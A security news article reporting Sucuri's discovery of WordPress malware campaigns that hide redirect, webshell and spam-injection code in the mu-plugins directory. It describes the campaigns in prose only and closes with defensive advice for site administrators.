WordPress attack campaigns are leveraging an often overlooked plugin directory to hide and automatically load malware on compromised sites, according to Sucuri.The Must-Use plugins (mu-plugins) directory is used to store essential plugins that are necessary for a site to run properly. The directory is separate from the standard interface where plugins are managed.This feature allows the files in mu-plugins to be automatically loaded on sites, and their storage in a separate directory is designed to prevent users from accidentally disabling them, which could break the site.However, Sucuri discovered several cases of attackers injecting the mu-plugins directory with malware in order to prevent detection and ensure their own files are automatically loaded.The malware campaigns detected included one that redirected site visitors to a malicious website, one that executed a webshell on the compromised site and one that used a script to replace images and links on the site with spam.The redirect malware was found in the file “redirect.php” in the mu-plugins directory and checked whether a visitor was a bot or administrator before sending them to a malicious website that prompted them to install a fake browser or system update.The webshell, which acts as a backdoor to enable remote code execution on the compromised WordPress server, was stored in the mu-plugins director in the file “index.php.” The file downloads and executes an external PHP script controlled by the attacker.The spam malware uses the file “custom-js-loader.php” and is a JavaScript injector that replaces all images on the WordPress site with pornographic content and hijacks all outbound links to a malicious popup.Sucuri noted that these multiple campaigns suggest an ongoing trend of attackers leveraging mu-plugins, with the company previously observing backdoor malware leveraging the directory in February.   The mu-plugins directory is often overlooked during normal security checks, according to Sucuri, and WordPress admins are recommended to ensure this directory is included in scans for malicious files.Admins are recommended to ensure their WordPress sites are secured by keeping WordPress, plugins and themes updated, using strong passwords and enabling two-factor authentication, as attackers first need to gain access to make changes to the mu-plugins directory.If a compromise is suspected, admins should ensure any unrecognized files in the mu-plugins directory are removed along with any other malicious files and unauthorized admin accounts.